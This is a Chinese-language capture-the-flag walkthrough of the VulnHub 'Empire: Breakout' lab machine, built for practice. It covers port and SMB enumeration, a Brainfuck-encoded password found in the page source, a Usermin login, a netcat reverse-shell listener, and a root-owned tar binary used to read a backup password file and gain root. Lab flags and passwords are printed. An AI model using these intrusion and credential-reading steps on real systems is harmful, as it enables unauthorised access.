Download: https://download.vulnhub.com/empire/02-Breakout.zip
Description
Difficulty: Easy
This box was created to be an Easy box, but it can be Medium if you get lost.
For hints discord Server ( https://discord.gg/7asvAhCEhe )
一:信息收集
netdiscover探测IP
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 50:d2:f5:7c:60:ea 2 120 Beijing Xiaomi Mobile Software Co., Ltd
192.168.1.223 08:00:27:99:43:a0 1 60 PCS Systemtechnik GmbH
192.168.1.238 52:96:66:d8:a6:d9 1 60 Unknown vendor
端口扫描
全端口扫描
$ nmap -p- --min-rate 10000 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:23 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00030s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
20000/tcp open dnp
Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
版本,--script=default 扫描
$ nmap -p80,139,445,10000,20000 -sV -sC 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:27 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
Host script results:
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-05-26T03:27:21
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.40 seconds
--script=vuln扫描
$ nmap -p80,139,445,10000,20000 --script=vuln 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:29 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00063s latency).
PORT STATE SERVICE
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.223
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.223:80/manual/ru/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/es/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/ko/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/pt-br/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/en/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/zh-cn/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/ja/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/fr/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/tr/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/de/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/da/index.html
| Form id:
|_ Form action: https://www.google.com/search
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /manual/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
10000/tcp open snet-sensor-mgmt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.exploit-db.com/exploits/1997/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_ http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_sslv2-drown:
20000/tcp open dnp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
Nmap done: 1 IP address (1 host up) scanned in 52.47 seconds
目录爆破
$ gobuster -u "http://192.168.1.223/" -w /wordlist/directory-list-2.3-medium.txt -x php,txt,html
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.1.223/
[+] Threads : 10
[+] Wordlist : /wordlist/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : html,php,txt
[+] Timeout : 10s
=====================================================
2023/05/25 23:31:31 Starting gobuster
=====================================================
/index.html (Status: 200)
/manual (Status: 301)
/server-status (Status: 403)
=====================================================
2023/05/25 23:32:46 Finished
=====================================================
不同的whatweb
$ whatweb https://192.168.1.223:10000/
https://192.168.1.223:10000/ [200 OK] Cookies[redirect,testing], Country[RESERVED][ZZ], HTML5, HTTPServer[MiniServ/1.981], HttpOnly[redirect,testing], IP[192.168.1.223], PasswordField[pass], Script, Title[Login to Webmin], UncommonHeaders[auth-type,content-security-policy,x-content-type-options,x-no-links], X-Frame-Options[SAMEORIGIN]
$ whatweb https://192.168.1.223:20000/
https://192.168.1.223:20000/ [200 OK] Cookies[redirect,testing], Country[RESERVED][ZZ], HTML5, HTTPServer[MiniServ/1.830], HttpOnly[redirect,testing], IP[192.168.1.223], PasswordField[pass], Script, Title[Login to Usermin], UncommonHeaders[auth-type,content-security-policy,x-content-type-options,x-no-links], X-Frame-Options[SAMEORIGIN]
主页下面有,下面我展示部分结果
$ curl http://192.168.1.223/
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->
https://ctf.bugku.com/tool/brainfuck
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
.2uqPEfj3D<P'a-3
枚举smb用户
$ enum4linux 192.168.1.223
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 26 00:15:30 2023
==========================
| Target Information |
==========================
Target ........... 192.168.1.223
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.168.1.223 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for 192.168.1.223 |
=============================================
Looking up status of 192.168.1.223
BREAKOUT <00> - B <ACTIVE> Workstation Service
BREAKOUT <03> - B <ACTIVE> Messenger Service
BREAKOUT <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
======================================
| Session Check on 192.168.1.223 |
======================================
[+] Server 192.168.1.223 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.168.1.223 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on 192.168.1.223 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at /usr/bin/enum4linux line 464.
[+] Got OS info for 192.168.1.223 from smbclient:
[+] Got OS info for 192.168.1.223 from srvinfo:
BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
platform_id : 500
os version : 6.1
server type : 0x809a03
==============================
| Users on 192.168.1.223 |
==============================
Use of uninitialized value $users in print at /usr/bin/enum4linux line 874.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 877.
Use of uninitialized value $users in print at /usr/bin/enum4linux line 888.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 890.
==========================================
| Share Enumeration on 192.168.1.223 |
==========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.5-Debian)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 192.168.1.223
//192.168.1.223/print$ Mapping: DENIED, Listing: N/A
//192.168.1.223/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
=====================================================
| Password Policy Information for 192.168.1.223 |
=====================================================
[E] Dependent program "polenum.py" not present. Skipping this check. Download polenum from http://labs.portcullis.co.uk/application/polenum/
===============================
| Groups on 192.168.1.223 |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on 192.168.1.223 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1683874020-4104641535-3793993001
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-500 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-502 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-503 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-504 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-505 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-506 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-507 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-508 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-509 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-510 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-511 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-512 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
S-1-5-21-1683874020-4104641535-3793993001-514 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-515 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-516 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-517 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-518 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-519 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-520 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-521 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-522 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-523 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-524 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-525 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-526 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-527 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-528 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-529 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-530 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-531 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-532 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-533 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-534 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-535 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-536 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-537 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-538 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-539 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-540 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-541 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-542 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-543 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-544 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-545 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-546 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-547 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-548 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-549 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-550 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1000 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1001 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1002 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1003 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1004 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1005 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1006 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1007 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1008 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1009 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1010 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1011 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1012 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1013 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1014 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1015 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1016 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1017 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1018 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1019 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1020 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1021 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1022 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1023 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1024 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1025 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1026 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1027 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1028 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1029 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1030 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1031 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1032 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1033 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1034 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1035 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1036 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1037 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1038 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1039 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1040 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1041 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1042 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1043 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1044 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1045 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1046 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1047 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1048 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1049 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
==============================================
| Getting printer info for 192.168.1.223 |
==============================================
No printers returned.
enum4linux complete on Fri May 26 00:15:40 2023
二:GetShell
用这个登录,20000端口
username: cyber
password: .2uqPEfj3D<P'a-3
然后反弹Shell
ok
$ nc -lvvp 1234
listening on [any] 1234 ...
192.168.1.223: inverse host lookup failed: Unknown host
connect to [192.168.1.171] from (UNKNOWN) [192.168.1.223] 39648
bash: cannot set terminal process group (1728): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$
user_flag
cyber@breakout:~$ cat user.txt
cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
三:提权
tar -cf 创建一个tar压缩文件
cyber@breakout:~$ ls -la /var/backups/
ls -la /var/backups/
total 28
drwxr-xr-x 2 root root 4096 May 25 23:37 .
drwxr-xr-x 14 root root 4096 Oct 19 2021 ..
-rw-r--r-- 1 root root 12732 Oct 19 2021 apt.extended_states.0
-rw------- 1 root root 17 Oct 20 2021 .old_pass.bak
cyber@breakout:~$ ls -l
ls -l
total 1272
-rw-r--r-- 1 cyber cyber 765823 May 26 00:40 linpeas.sh
-rwxr-xr-x 1 root root 531928 Oct 19 2021 tar
-rw-r--r-- 1 cyber cyber 48 Oct 19 2021 user.txt
cyber@breakout:~$ ./tar -cf pass.tar /var/backups/.old_pass.bak
./tar -cf pass.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ls
ls
linpeas.sh pass.tar tar user.txt
cyber@breakout:~$ tar -xf pass.tar
tar -xf pass.tar
cyber@breakout:~$ ls
ls
linpeas.sh pass.tar tar user.txt var
cyber@breakout:~$ cd var
cd var
cyber@breakout:~/var$ ls
ls
backups
cyber@breakout:~/var$ cd backups
cd backups
cyber@breakout:~/var/backups$ ls
ls
cyber@breakout:~/var/backups$ ls -la
ls -la
total 12
drwxr-xr-x 2 cyber cyber 4096 May 26 04:16 .
drwxr-xr-x 3 cyber cyber 4096 May 26 04:16 ..
-rw------- 1 cyber cyber 17 Oct 20 2021 .old_pass.bak
cyber@breakout:~/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~/var/backups$ su
su
Password: Ts&4&YurgtRX(=~h
root@breakout:/home/cyber/var/backups# id
id
uid=0(root) gid=0(root) groups=0(root)
root@breakout:/home/cyber/var/backups# cd ../
cd ../
root@breakout:/home/cyber/var# cd
cd
root@breakout:~# ls
ls
rOOt.txt
root@breakout:~# cat rOOt.txt
cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
Author: Icex64 & Empire Cybersecurity
root@breakout:~#